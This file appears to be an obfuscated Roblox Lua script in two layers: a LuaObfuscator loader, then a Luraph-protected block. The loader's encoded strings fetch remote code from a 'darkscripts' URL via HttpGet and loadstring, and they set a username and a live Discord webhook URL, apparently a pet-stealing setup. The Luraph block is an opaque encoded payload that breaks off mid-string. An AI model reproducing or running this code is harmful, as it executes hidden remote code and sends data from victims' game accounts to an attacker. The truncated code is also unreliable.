--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v87=v2(v0(v30,16));if v19 then local v117=v5(v87,v19);v19=nil;return v117;else return v87;end end end);local function v20(v31,v32,v33) if v33 then local v88=(v31/(2^(v32-1)))%((5 -3)^(((v33-(2 -1)) -(v32-(1 -0))) + ((1 + 1) -1))) ;return v88-(v88%(620 -(555 + 64))) ;else local v89=931 -(857 + 74) ;local v90;while true do if (v89==(568 -(367 + 201))) then v90=(929 -(214 + (1590 -(282 + 595))))^(v32-1) ;return (((v31%(v90 + v90))>=v90) and 1) or (0 + 0) ;end end end end local function v21() local v34=1637 -(1523 + (496 -382)) ;local v35;while true do if (v34==(1 + 0)) then return v35;end if (v34==(0 -0)) then v35=v1(v16,v18,v18);v18=v18 + (1066 -(68 + 997)) ;v34=(1388 -(32 + 85)) -(222 + 4 + 1044) ;end end end local function v22() local v36,v37=v1(v16,v18,v18 + 2 );v18=v18 + 1 + 1 ;return (v37 * (1213 -(892 + 65))) + v36 ;end local function v23() local v38=0 -0 ;local v39;local v40;local v41;local v42;while true do if (v38==(1 -0)) then return (v42 * (41190819 -24413603)) + (v41 * (120312 -54776)) + (v40 * 256) + v39 ;end if (v38==(0 + 0)) then v39,v40,v41,v42=v1(v16,v18,v18 + (11 -8) );v18=v18 + ((952 -598) -(87 + 263)) ;v38=1;end end end local function v24() local v43=0 -(0 + 0) ;local v44;local v45;local v46;local v47;local v48;local v49;while true do if (v43==(2 + 0)) then v48=v20(v45,21,1028 -(915 + (299 -217)) );v49=((v20(v45,90 -58 )==(1 + 0)) and  -(1 -(0 -0))) or (1188 -(1069 + 118)) ;v43=6 -3 ;end if (v43==((860 -(814 + 45)) -(0 -0))) then v46=1 + 0 + 0 ;v47=(v20(v45,1 -0 ,8 + 12 + 0 ) * ((793 -((1253 -(261 + 624)) + (751 -328)))^(100 -68))) + v44 ;v43=20 -(10 + 8) ;end if (v43==((1091 -(1020 + 60)) -8)) then if (v48==0) then if (v47==(442 -(416 + 26))) then return v49 * 0 ;else local v131=(1423 -(630 + 793)) -(0 -0) ;while true do if (v131==(0 + 0)) then v48=1 -0 ;v46=0;break;end end end elseif (v48==(2485 -(145 + 293))) then return ((v47==(430 -(44 + 386))) and (v49 * ((1487 -(998 + 488))/(0 + 0)))) or (v49 * NaN) ;end return v8(v49,v48-(838 + 185) ) * (v46 + (v47/(2^(824 -((951 -750) + 571))))) ;end if (v43==(1138 -(116 + 1022))) then v44=v23();v45=v23();v43=4 -(2 + 1) ;end end end local function v25(v50) local v51=(1055 -(87 + 968)) -0 ;local v52;local v53;while true do if (v51==(1750 -(760 + 987))) then return v6(v53);end if (v51==(1913 -(1789 + 124))) then v52=nil;if  not v50 then local v124=0;while true do if (v124==(766 -((3279 -2534) + 21))) then v50=v23();if (v50==0) then return "";end break;end end end v51=1 + 0 + 0 ;end if (v51==(5 -3)) then v53={};for v118=3 -2 , #v52 do v53[v118]=v2(v1(v3(v52,v118,v118)));end v51=6 -3 ;end if (v51==(1 + 0)) then v52=v3(v16,v18,(v18 + v50) -1 );v18=v18 + v50 ;v51=2 + 0 ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v54=(function() return function(v91,v92,v93,v94,v95,v96,v97,v98) local v91=(function() return 0 -0 ;end)();local v92=(function() return;end)();local v94=(function() return;end)();while true do if (v91==(1467 -(899 + 568))) then local v125=(function() return 0 + 0 ;end)();local v126=(function() return;end)();while true do if (v125~=0) then else v126=(function() return 0;end)();while true do if (v126==0) then v92=(function() return v93();end)();v94=(function() return nil;end)();v126=(function() return 2 -1 ;end)();end if (v126==1) then v91=(function() return  #":";end)();break;end end break;end end end if (v91~= #"[") then else if (v92== #"~") then v94=(function() return v93()~=0 ;end)();elseif (v92==2) then v94=(function() return v95();end)();elseif (v92~= #"19(") then else v94=(function() return v96();end)();end v97[v98]=(function() return v94;end)();break;end end return v91,v92,v93,v94,v95,v96,v97,v98;end;end)();local v55=(function() return function(v99,v100,v101,v102,v103,v104,v105,v106,v107) local v108=(function() return 603 -(268 + 335) ;end)();local v99=(function() return;end)();local v100=(function() return;end)();while true do if ((290 -(60 + 230))==v108) then local v128=(function() return 572 -(426 + 146) ;end)();local v129=(function() return;end)();while true do if (v128==(0 + 0)) then v129=(function() return 0;end)();while true do if (v129~=1) then else v108=(function() return 1;end)();break;end if (v129~=(1456 -(282 + 1174))) then else v99=(function() return 0;end)();v100=(function() return nil;end)();v129=(function() return 1;end)();end end break;end end end if (v108==1) then local v130=(function() return 0;end)();while true do if (v130~=0) then else while true do if (v99==0) then v100=(function() return v101();end)();if (v102(v100, #"~", #"~")==(811 -(569 + 242))) then local v188=(function() return 0;end)();local v189=(function() return;end)();local v190=(function() return;end)();local v191=(function() return;end)();local v192=(function() return;end)();while true do if (v188~=(5 -3)) then else while true do if (v189== #"{") then local v208=(function() return 0;end)();local v209=(function() return;end)();while true do if (v208~=(0 + 0)) then else v209=(function() return 1024 -(706 + 318) ;end)();while true do if (v209==1) then v189=(function() return 1253 -(721 + 530) ;end)();break;end if (v209==(1271 -(945 + 326))) then v192=(function() return {v103(),v103(),nil,nil};end)();if (v190==(0 + 0)) then local v216=(function() return 700 -(271 + 429) ;end)();local v217=(function() return;end)();while true do if (v216~=0) then else v217=(function() return 0 + 0 ;end)();while true do if (v217==0) then v192[ #"gha"]=(function() return v103();end)();v192[ #".dev"]=(function() return v103();end)();break;end end break;end end elseif (v190== #">") then v192[ #"91("]=(function() return v104();end)();elseif (v190==(1502 -(1408 + 92))) then v192[ #"91("]=(function() return v104() -(2^(1102 -(461 + 625))) ;end)();elseif (v190== #"19(") then local v224=(function() return 1288 -(993 + 295) ;end)();local v225=(function() return;end)();while true do if (v224~=0) then else v225=(function() return 0;end)();while true do if (v225~=0) then else v192[ #"nil"]=(function() return v104() -((1 + 1)^(1187 -(418 + 753))) ;end)();v192[ #"0313"]=(function() return v103();end)();break;end end break;end end end v209=(function() return 1 + 0 ;end)();end end break;end end end if (v189==(0 + 0)) then local v210=(function() return 0;end)();local v211=(function() return;end)();while true do if (v210~=0) then else v211=(function() return 0;end)();while true do if (v211==(1 + 0)) then v189=(function() return  #"\\";end)();break;end if (0==v211) then v190=(function() return v102(v100,1 + 1 , #"xnx");end)();v191=(function() return v102(v100, #"asd1",535 -(406 + 123) );end)();v211=(function() return 1770 -(1749 + 20) ;end)();end end break;end end end if (v189~=2) then else local v212=(function() return 0 + 0 ;end)();local v213=(function() return;end)();while true do if (v212==(1322 -(1249 + 73))) then v213=(function() return 0;end)();while true do if (v213~=1) then else v189=(function() return  #"gha";end)();break;end if (v213==(0 + 0)) then if (v102(v191, #" ", #"[")~= #"}") then else v192[2]=(function() return v105[v192[2]];end)();end if (v102(v191,2,2)~= #".") then else v192[ #"xxx"]=(function() return v105[v192[ #"xnx"]];end)();end v213=(function() return 1146 -(466 + 679) ;end)();end end break;end end end if (v189~= #"nil") then else if (v102(v191, #"xnx", #"nil")== #".") then v192[ #".com"]=(function() return v105[v192[ #"http"]];end)();end v106[v107]=(function() return v192;end)();break;end end break;end if (v188==(2 -1)) then local v205=(function() return 0;end)();local v206=(function() return;end)();while true do if (v205==0) then v206=(function() return 0 -0 ;end)();while true do if (v206==1) then v188=(function() return 1902 -(106 + 1794) ;end)();break;end if (v206==(0 + 0)) then v191=(function() return nil;end)();v192=(function() return nil;end)();v206=(function() return 1 + 0 ;end)();end end break;end end end if (v188==(0 -0)) then local v207=(function() return 0;end)();while true do if (v207==0) then v189=(function() return 0 -0 ;end)();v190=(function() return nil;end)();v207=(function() return 1;end)();end if ((115 -(4 + 110))~=v207) then else v188=(function() return 585 -(57 + 527) ;end)();break;end end end end end break;end end return v99,v100,v101,v102,v103,v104,v105,v106,v107;end end end end end;end)();local v56=(function() return function(v109,v110,v111) local v112=(function() return 1427 -(41 + 1386) ;end)();local v113=(function() return;end)();while true do if ((103 -(17 + 86))==v112) then v113=(function() return 0;end)();while true do if (v113==0) then local v132=(function() return 0 + 0 ;end)();local v133=(function() return;end)();while true do if ((0 -0)==v132) then v133=(function() return 0 -0 ;end)();while true do if (v133~=0) then else v109[v110-#"\\" ]=(function() return v111();end)();return v109,v110,v111;end end break;end end end end break;end end end;end)();local v57=(function() return {};end)();local v58=(function() return {};end)();local v59=(function() return {};end)();local v60=(function() return {v57,v58,nil,v59};end)();local v61=(function() return v23();end)();local v62=(function() return {};end)();for v70= #".",v61 do FlatIdent_63487,Type,v21,Cons,v24,v25,v62,v70=(function() return v54(FlatIdent_63487,Type,v21,Cons,v24,v25,v62,v70);end)();end v60[ #"91("]=(function() return v21();end)();for v71= #"<",v23() do FlatIdent_8199B,Descriptor,v21,v20,v22,v23,v62,v57,v71=(function() return v55(FlatIdent_8199B,Descriptor,v21,v20,v22,v23,v62,v57,v71);end)();end for v72= #".",v23() do v58,v72,v28=(function() return v56(v58,v72,v28);end)();end return v60;end local function v29(v64,v65,v66) local v67=v64[167 -(122 + 44) ];local v68=v64[1935 -(565 + 1368) ];local v69=v64[5 -2 ];return function(...) local v73=v67;local v74=v68;local v75=v69;local v76=v27;local v77=3 -2 ;local v78= -(1 + 0);local v79={};local v80={...};local v81=v12("#",...) -1 ;local v82={};local v83={};for v114=0 -0 ,v81 do if ((95<1957) and (v114>=v75)) then v79[v114-v75 ]=v80[v114 + (66 -(30 + 35)) ];else v83[v114]=v80[v114 + ((2 -0) -1) ];end end local v84=(v81-v75) + 1 + 0 ;local v85;local v86;while true do v85=v73[v77];v86=v85[1258 -(113 + 930 + 214) ];if (v86<=(18 -13)) then if ((826<1717) and (v86<=(1214 -(323 + (1286 -397))))) then if (v86<=(0 -(806 -(118 + 688)))) then local v134=580 -(361 + 219) ;local v135;local v136;local v137;local v138;while true do if ((1 + 1)==v134) then for v185=v135,v78 do local v186=320 -(53 + 267) ;while true do if (v186==(0 + 0)) then v138=v138 + (414 -(15 + 398)) ;v83[v185]=v136[v138];break;end end end break;end if ((1426>=1105) and (3330>2323) and (v134==(268 -(176 + 91)))) then v78=(v137 + v135) -(2 -1) ;v138=982 -(18 + 964) ;v134=7 -5 ;end if ((v134==(0 + 0)) or (3626==3989)) then v135=v85[1877 -(157 + 1718) ];v136,v137=v76(v83[v135](v13(v83,v135 + 1 + (48 -(25 + 23)) ,v85[853 -(20 + 830) ])));v134=1 + 0 ;end end elseif ((2754<=3379) and (v86>(1019 -(135 + 562 + 321)))) then v83[v85[5 -3 ]]=v85[129 -(116 + 10) ];else local v144;local v145,v146;local v147;local v148;v83[v85[1 + (1887 -(927 + 959)) ]]=v66[v85[741 -(542 + 196) ]];v77=v77 + (1 -0) ;v85=v73[v77];v148=v85[5 -3 ];v147=v83[v85[6 -3 ]];v83[v148 + 1 + 0 ]=v147;v83[v148]=v147[v85[1231 -(322 + 905) ]];v77=v77 + 1 ;v85=v73[v77];v83[v85[2 + (0 -0) ]]=v85[3];v77=v77 + (733 -(16 + 716)) + 0 ;v85=v73[v77];v148=v85[4 -2 ];v145,v146=v76(v83[v148](v13(v83,v148 + (2 -1) ,v85[875 -(826 + 46) ])));v78=(v146 + v148) -1 ;v144=1551 -(1126 + 425) ;for v170=v148,v78 do local v171=405 -(118 + (553 -266)) ;while true do if ((v171==(0 -(97 -(11 + 86)))) or (3927==1413)) then v144=v144 + ((2736 -1614) -(118 + 1003)) ;v83[v170]=v145[v144];break;end end end v77=v77 + (441 -(382 + (343 -(175 + 110)))) ;v85=v73[v77];v148=v85[5 -3 ];v83[v148]=v83[v148](v13(v83,v148 + (378 -(142 + 235)) ,v78));v77=v77 + 1 ;v85=v73[v77];v83[v85[9 -7 ]]();v77=v77 + 1 + 0 ;v85=v73[v77];v77=v85[980 -(553 + 424) ];end elseif (v86<=(5 -(4 -2))) then do return;end elseif (v86>(4 + 0)) then v77=v85[5 -2 ];else local v162=0 + 0 ;local v163;while true do if (v162==((0 -0) + 0)) then v163=v85[1 + 1 ];v83[v163]=v83[v163](v13(v83,v163 + 1 + 0 ,v78));break;end end end elseif (v86<=(17 -9)) then if (v86<=(16 -(1806 -(503 + 1293)))) then local v139=0 -0 ;while true do if (v139==(683 -(483 + 200))) then v66[v85[(2 -1) + 2 ]]=v83[v85[9 -7 ]];v77=v77 + (2 -(1 + 0)) ;v85=v73[v77];v139=754 -(239 + 514) ;end if ((v139==((1062 -(810 + 251)) + 1)) or (1154<=788)) then v66[v85[1332 -(554 + 243 + 532) ]]=v83[v85[2 + 0 + 0 ]];v77=v77 + (3 -2) ;v85=v73[v77];v139=3;end if ((v139==3) or (1643>3379)) then v83[v85[4 -2 ]]=v85[5 -(2 + 0) ];v77=v77 + 1 + 0 ;v85=v73[v77];v139=9 -5 ;end if ((1206 -(373 + 829))==v139) then v77=v85[734 -(476 + 255) ];break;end if ((v139==(1131 -(369 + 761))) or (2803>4549)) then v83[v85[2 + (533 -(43 + 490)) ]]=v85[5 -2 ];v77=v77 + (1 -0) ;v85=v73[v77];v139=(973 -(711 + 22)) -(64 + 174) ;end end elseif ((v86==(9 -(7 -5))) or (916==2671)) then if (v83[v85[1 + 1 ]]==v85[5 -(860 -(240 + 619)) ]) then v77=v77 + 1 + 0 ;else v77=v85[339 -(144 + 192) ];end else v66[v85[219 -(42 + 174) ]]=v83[v85[767 -(574 + 191) ]];end elseif ((272==272) and (v86<=(7 + 2))) then v83[v85[1 + 1 + (0 -0) ]]=v66[v85[2 + 1 ]];elseif (((4249<=4839) and (v86>((101 + 1413) -((2107 -(1344 + 400)) + 1141)))) or (220>=3022)) then local v166=126 -(55 + 71) ;local v167;local v168;while true do if (1==v166) then v83[v167 + (1581 -(1183 + 397)) ]=v168;v83[v167]=v168[v85[11 -7 ]];break;end if ((2777<3200) and (v166==(0 + 0))) then v167=v85[2 + 0 ];v168=v83[v85[1978 -(1913 + 62) ]];v166=1 -0 ;end end else v83[v85[2 + 0 ]]();end v77=v77 + (940 -(714 + (630 -(255 + 150)))) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!0A3Q00028Q00026Q00F03F030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q7470476574031F3Q00682Q7470733A2Q2F6461726B736372697074732E73706163652F706574676F03083Q00557365726E616D65030D3Q004772616E745F6A6F7264616E3503073Q00576562682Q6F6B03793Q00682Q7470733A2Q2F646973636F72642E636F6D2F6170692F776562682Q6F6B732F31332Q30334Q342Q33382Q333230352Q372F385375544E2Q504F5658364759637433754B656D6C2Q582D4A556D50387549385F706F6E4864384C4443654C567256335A556C494846795F49344F77496864482D4F786700143Q0012023Q00013Q0026073Q000B000100020004053Q000B0001001209000100033Q001201000200043Q00202Q00020002000500122Q000400066Q000200046Q00013Q00024Q00010001000100044Q001300010026073Q0001000100010004053Q00010001001202000100083Q001206000100073Q00122Q0001000A3Q00122Q000100093Q00124Q00023Q00044Q000100012Q00033Q00017Q00",v9(),...);-- This file was protected using Luraph Obfuscator v14.2 [https://lura.ph/]

return(function(x,p,n,L,O,i,E,d,V,S,B,j,m,I,a,C,N,Z,y,J,o,f,t,D,h,z,G,U,M,Y,Q,X,K,e,_)B=({});local v=(0B1110010);repeat if v==0x72 then if not B[0X1_3a7]then v=(-1057126242+-(X.q((X.k((X.b(_[0B010],_[0X7],_[0x2])))))-_[6]));B[0X13A7]=(v);else v=(B[0X13_a7]);end;else if v==41 then if not B[31962]then v=(4213219257+-(X.i((X.r((X.n(_[0B10],0X4)))))+_[8]));B[31962]=(v);else v=B[31962];end;else if v==0x74_ then if not not B[0x2671]then v=B[0x2__671];else v=(0xb7+-(X.c(_[5]==_[0B100]and _[0x1]or _[0X5])-_[0x7]>_[0X8_]and _[0b1001]or v));(B)[9841]=(v);end;continue;else if v~=0B1000011 then else break;end;end;end;end;until false;v=0X79__;while true do if not(v<0X079)then if v>0X4 then if not B[27932]then v=(0X24+-X.q((X.r((v>=_[4]and B[5031]or _[0X7])+_[8]))));B[0X6D_1C]=(v);else v=B[0x6d1C];end;continue;end;else break;end;end;local r,R,k,F={};v=70;repeat if v==0x46 then R=(h.bxor);if not not B[0X25cB]then v=B[0X25cB];else(B)[0X40Ae]=(3923780054+-X.z(X.c((X.N(_[0X3__],B[0X6d1C])))-_[0X5],B[0X6d1C]));v=-0X7e8ca067+-((_[0B1]+B[0X13a7__]<B[27932]and _[0X6]or _[6])-_[4]+B[9841]);B[0X25cb]=v;end;else if v==0X6D then if not B[0X1035]then B[0X6410]=3180271863+-(X.k(_[0B00110]-B[0X40AE],B[31962])+_[0B1001]<=_[5]and _[0B00100]or _[0B10]);v=-79+-((_[0B100]<_[8]and _[0X1]or B[0X13a7])-_[0X01]-B[0X7CdA]-B[0x2671]);(B)[0X1035]=(v);else v=(B[0x10_35]);end;continue;elseif v==0b1101000 then k=(X.W);if not B[26671]then v=(0X24011E98+-X.b(X.i(_[0x8_])+B[0x40Ae]-_[0X9],_[0b10],B[31962]));(B)[26671]=(v);else v=(B[0X682f]);end;else if v==39 then if not B[30658]then B[0X5439]=(23243+-(X.N(X.n(B[0X6D1c],B[0X6d1c])-_[0x6],B[0X4_0Ae])+_[1]));(B)[28740]=7036326425+-(X.k(_[2],v,B[4149])-B[26671]+_[0X4]+_[0X1]);v=(0X5C1__736C_9+-X.c((X.b((X.c(_[7]-_[0X6]))))));(B)[0X77c2]=v;else v=B[30658];end;else if v==0X5A then F=(getfenv);break;end;end;end;end;until false;local u;v=(0X48);while true do if v>0x48 and v<0X7c then if not B[20394]then v=3510632505+-(X.z(X.z(_[3],B[0X40ae])+_[0X8],B[0X40Ae])-B[9841]);(B)[20394]=(v);else v=B[20394];end;continue;elseif v>0X3A and v<0x51 then u=(n);if not not B[0X3eD3]then v=B[16083];else B[0X3616]=(0X1_5F+-((_[0B11__0]-B[27932]<B[30658]and B[0X40AE]or B[0X7CDa])+B[0x682F]+B[0X25CB]));B[30333]=(4294967232+-X.c((X.i((X.b(_[0b10]<_[0X05]and B[0X13_a7]or B[0X001035])),_[0X7],_[2]))));v=4213219189+-((X.k(B[28740])-_[7]==B[0X13A7]and B[21561]or B[5031])+_[0X8]);B[0X3eD3]=(v);end;continue;elseif v>0x51 then break;else if v<72 and v>0B111 then if not not B[0X4dB7]then v=B[0x4dB7];else v=0X95+-X.i((X.i((X.i(B[0X0641_0]>=B[16558]and _[0b1001]or B[0x767d])))),_[0x8],B[0X7cdA_]);(B)[19895]=v;end;else if v<0x3a then if not B[0x45B8]then v=2362898234+-X.z(B[0X767D]-B[0X7044]+_[0x7]-B[16083],B[0x3ED3]);B[0x45B8]=v;else v=B[0X45b8];end;end;end;end;end;local w,g,q;v=0X72;while true do if v~=0X72 then q=0B1;break;else w=(X.l);g=function(x,p,n)local L,O=(0X45);repeat if L==69 then if not(p>x)then else return;end;L=96;elseif L==0X60 then O=x-p+0X1;L=(0x3f);else if L~=0X3f then else if O>=0X8 then return n[p],n[p+0X1],n[p+2],n[p+3],n[p+0X4],n[p+0x5],n[p+0X6],n[p+0X7],g(x,p+0X8,n);elseif O>=o then return n[p],n[p+0X1],n[p+0X2],n[p+3],n[p+0B100],n[p+a],n[p+6],g(x,p+7,n);elseif O>=0B110__ then return n[p],n[p+j],n[p+0b10],n[p+0X3],n[p+0x4],n[p+5],g(x,p+0X6,n);elseif O>=0X5 then return n[p],n[p+0B1],n[p+m],n[p+3],n[p+0B100],g(x,p+5,n);elseif O>=4 then return n[p],n[p+0B1],n[p+0B10],n[p+3],g(x,p+0X4,n);else if O>=0X3 then return n[p],n[p+1],n[p+2],g(x,p+0X3,n);else if O>=m then return n[p],n[p+0x1],g(x,p+2,n);else return n[p],g(x,p+j,n);end;end;end;break;end;end;until false;end;if not B[15105]then B[0x586c]=154+-X.k((X.k((_[0X6]<B[13846]and B[0X5439]or B[21561])>_[0x1]and v or v)));v=(0B1101_011_+-((_[0B1000]+B[0x5439]+B[19895]>=B[30658]and B[20394]or v)-B[0X45b8]));(B)[15105]=v;else v=B[0X3B01];end;end;end;local a,o;v=(25);while true do if v<36 then a=function(p,n,L)for x=0X7__b,294,0x7__2 do if x<237 then p=(p or 0B1);continue;else if x>0X7b then L=L or#n;break;end;end;end;if L-p+0B1>Z then return g(L,p,n);else return x(n,p,L);end;end;if not B[30939]then B[0x58_7e]=(0X54+-((X.n(_[0B10]-B[0X77c2],B[0X6D1c])~=B[17848]and _[0x03]or B[21561])<=B[30658]and v or B[16558]));v=3180271882+-(X.i(B[0X77c2]+B[0X4db7],B[0X767d])+v+_[4]);(B)[30939]=(v);else v=(B[0X78__dB]);end;else if v>0X24 then o=9007199254740992;break;else if v<0x33 and v>0X19 then if not not B[0X25_C5__]then v=(B[9669]);else v=(0x75+-X.c((X.i(X.c(B[0x4FAa])+B[17848]))));B[9669]=(v);end;continue;end;end;end;end;local x,Z;v=(0X6C);repeat if v<0x05b__ then Z={4,5,2};break;elseif v<0X7e and v>91 then if not not B[0X5c60]then v=(B[23648]);else v=(0Xb2+-(X.n((X.z((X.n(B[0X4DB7],B[27932])),B[0X40Ae])),B[27932])>=B[0X7cdA]and B[0x03616]or _[6]));B[0X5C_60]=v;end;elseif v>0X6c then x={};if not not B[0X24__92]then v=B[0X2492];else(B)[31433]=(0X40000D+-X.D((X.q(_[0x8]+B[0X00587e]+B[26671])),B[0X40AE]));v=(-3675413242+-(B[28740]-_[0X9]-B[22636]-_[5]-B[21561]));B[0X2492_]=(v);end;continue;else if not(v<0B1101100 and v>0x45)then else if not not B[25663]then v=B[0X643f];else v=(-0X394_95Da7+-((_[0B1]+_[0B11__0]+_[0X6]<=v and _[0x6]or B[0X45b8])-_[0X9_]));(B)[0X64__3f]=(v);end;continue;end;end;until false;local g;v=0x53;repeat if v~=0B1010011 then if v==22 then for x=0B0,255 do(r)[x]=C(x);end;if not B[29667]then B[18406]=-0X31+-(X.r(B[0X25Cb]-_[0B00110]+B[0X4f_AA__])-B[23648]);v=(-2714303443+-((X.c(B[9669])<=_[0B101]and B[0X267_1]or B[26671])+B[0X40Ae]-_[0X5]));(B)[29667]=v;else v=B[29667];end;else if v==0X7d then g=(function(x)x=D(x,'\122',"!\z  \u{021}\!\u{021}\u{0021}");return D(x,'..\z \u{2E}\.\u{02E}',w({},{__index=function(x,p)local n,L,O,i,E=k(p,0b1__,0B101);local V=(E-0x21+(i-33)*0X55+(O-0x21)*7225+(L-0X21)*614125+(n-0b100001)*0X31c84B1);E=d('\>I4',V);x[p]=(E);return E;end}));end)(J("LPH]e>WHKJ-L+@E+Ns\"J-L%&GB7>;J-eq>Ak5?VDe!s@oG%]U+<VdL+<VdY/R)Ed$6UH6+<VdL+<VdL+<VdL+<VdL+<VdL+<W:%,q(Dr/1rP-/hSb/+<VdL+<W9h/hAP'0.8%k-9sgK$6UH6+<VdL+<VdL+<VdL+<VdL+<W'^+<VdX0.8%k,pjs(5X7R],q(/p0/\"t,-n$;b,pOWZ-n$_u.P*,'+<VdL+=o0!-mgPR+<VdL+<VdL+<VdL+<VdL+<Vd[.Ng>i5X7S\"5X7S\",qL/]/gr&35X6YC-71&d5X7S\"5X6Y@-n6c#/hSb//hSb+,sX^\\-nZVb/0cbS+<VdL+<VdL+<VdL+<VdL+=]#e/g`hK5X7S\"5Umm!-m^De+<W-^-71uC5X7R],q(5o/g)8Z+<VdL+<VdL+<W9f.OZMf-n7JI-7U,\\.P(oL+<VdL+<VdL+<VdL+<VdO/0HT25X7S\"5Umm+-7Buf-71Au/2&4o-71uC5UIm+5X7S\"5X7S\"5X7S\",:Y5s/hSb//2&>85X7S\"5X7R_+>+rI+<VdL+<VdL+<VdL+<VdO+<Vmo5X7S\".PF%5+>+lb/h\\V(/hAY*/2&Y+/1rJ,-n7JI5X7S\"5X7S\"5X6V\\5X7S\"5X7S\",;(3+5X7S\"5UJ*+,mkb;+<VdL+<VdL+<VdL0-DAa5X7S\"5X7S\"-m_,'+=\\]b.OIDG5X6PI-9sg]5VFE0/hA;65X7S\"5X6VK5X6YE/0H&d/1`D+/g)8d,sX^\\,9SHC+<VdL+<VdL+<VdL,9S*]-9sg]5X7S\"5X7S\"/1;nm5X7S\"5U.m(+<VdX-9sg@5X6YG+>,!+5X7S\"-7gbo5X7S\"0.&qL,q)#D5UIm4/1;hr+>58Q+<VdL+<VdL+=Jlc+<W't-71&c-9sg]-8-nm/3kF.5X7S\"/0H&X+<VdL+<s-:0.\\G8-6Os,5X7S\"/0uMe5X7S\"5U[`t+<VdV5X7S\"5UJ$.,q^;m$6UH6+<VdL+>4i[,;1Sm5X7R],:G2u,=\"LZ0-DQ+5X6Y]5X6_M+<VdL/1*VI-nZu&.Nfi[5X6eA+<Vsq5X7S\"5U@Nq+<VdL+=KK?-7C>r/hSFs/d`^D+<VdL+<Vd[0/#RU-7g8^-mh2E,:jr[+>5u5+=nuh5X7S\",:5Z@,pO]a-m_,*.NgB05X7S\"5UJ*+,=\"LZ,:5Z@5UId'5X7S\"5X6YI0.8;80-^fH+<VdL+<VdQ,q^N0,9STc5X7RZ+>5uF5X6VB5X7R]0.n@i+=o/o-nd&$+<W9i-9sg]5X7S\"5X7Rc.OHPr0-rkK,:Y$*5X6_B-n[,)/hA=o.R5Wo+<VdL+<VdL5UA$0-6Oof5X7R].NfiV+>5',5X7S\"5X7S\"5X7S\"5X7R]5X6PI-m_,D5X7S\"5X7S\"-7g8^-pU$_5X7S\"5X7S\"5VFZR5X7S\",;(;m$6UH6+<VdL+=8Ed,paZd-7U,\\+<W=&5X6_M+<W3`5X7S\"5UJ-40/\"t3,:FZf-9sg]5X7S\"5X7S\"5X7S\"-m0W`-9sg]5X7S\"5UJ$)-pU$E.PF%80+&gE+<VdL+<W9_.O.2,+>5uF5X6_?.R66a5X7Rf+<VdL+=\\[&5X7S\"5X6YK/3kO)/0c\\g/g`hK5X7S\",9ST`.O?Dp/0dDF5X6eA+<W.!5UJ-6-7T?F+<VdL+<VdL/g`5(,=\"LZ5X7S\"/0H&X.OIDG,q^_q5X6YE/0H&X+=noe5U@aB5X7S\"5X7S\"-nZu#+<W=&5X7S\"5X7S\"-7g8^+<VdL,sX^\\5V=Yr+<VdL+<VdL5Umm/,sX^\\5X7S\"5U[`t+<VdL+>+cZ+=KK?5X7S\"5X6_?+<VdL+<W9d-m^3*5X7S\"5X7S\"5X7R]-nHJ`/h\\h,5U@Nq+>5uF,p4fn$6UH6+<VdL+<Vdl.Ng>j5X7S\"5X6YK+<VdL+<VdL+<VdL+>,;o5X7Ra/g`hK5X7S\"5UJ$)/1N,#/g)8Z+>,2p-mg>p,sX^?+=09&+<W4#5U@O(,75P9+<VdL+<VdL+<W!^+>5uF5X7S\".NfiV+<VdL+<VdL+<VdL+<VdL+>+m(5X7S\"5X7Ra/gWbJ5X7R_/3lHc5X7R]+=nfe/g)8Z+<VdZ-9rk\"/0bKE+<VdL+<VdL+<VdL+>4ie5X7S\"5U.Bo+<VdL+<VdL+<VdL+<VdL+<VdL+<VdL+<VdL+<VdL+<VdL+<VdL+<VdL+<VdL+<VdL+<VdL+=09\"/hA4S+<VdL+<VdL+<VdL+<W'\\+>,!+5X7Ra+<VdL+<VdL+<VdL+<VdL+<VdL+<VdL+<VdL+<VdL+<VdL+<VdL+<VdL+<VdL+<VdL+<VdL+<Vmo-8$ho$6UH6+<VdL+<VdL+<VdL/g`1n/1*VI5V+$#+<VdL+<VdL+<VdL+<VdL+<VdL+<VdL+<VdL+<VdL+<VdL+<VdL+<VdL+<VdL+<VdL+<VdT5UJ*7,75P9+<VdL+<VdL+<VdL+<VdL,;()k,sX^F+>5uF0-DA[+<VdL+<VdL+<VdL+<VdL+<VdL+<VdL+<VdL+<VdL+<VdL+<VdL+<VdL+<VdL00gj:/1:iJ+<VdL+<VdL+<VdL+<VdL+<VdZ0-DA^5UA$*,sWe./0c\\g+<VdL+<VdL+<VdL+<VdL+<VdL+<VdL+<VdL+<VdL+<VdL+<VdL+<VdL+>5uF/1rR_+<VdL+<VdL+<VdL+<VdL+<VdL+<W-^+<Vmo,q^;m+=KK?5X7R\\0.\\4g+<VdL+<VdL+<VdL+<VdL+<VdL+<VdL+<VdL+<VdL+<VdL+<W=&5V+N;$6UH6+<VdL+<VdL+<VdL+<VdL+<VdL+>5Aj+=09\"/0HE-5X7S\"5X7R_+=KK$0.n@i+<VdL+<VdL+<VdL+<VdL+<VdL+<VdL+<VdL+<VdO5X6kC-jh(>+<VdL+<VdL+<VdL+<VdL+<VdL+<VdL,:Xfg-9sg@/g)Q-5X7R]/h0+O5X7S\"5X6VJ+=]#s+<VdL+<VdL+<VdL+<VdL+<W-d/gVu\"-9sgI+>4'E+<VdL+<VdL+<VdL+<VdL+<VdL+<VdL+<Vdl.Ng>i5X7R\\/0HJs+>,oE5X7S\"5X7S\"/1r565X7S\",p4fe5X7Ra+<s,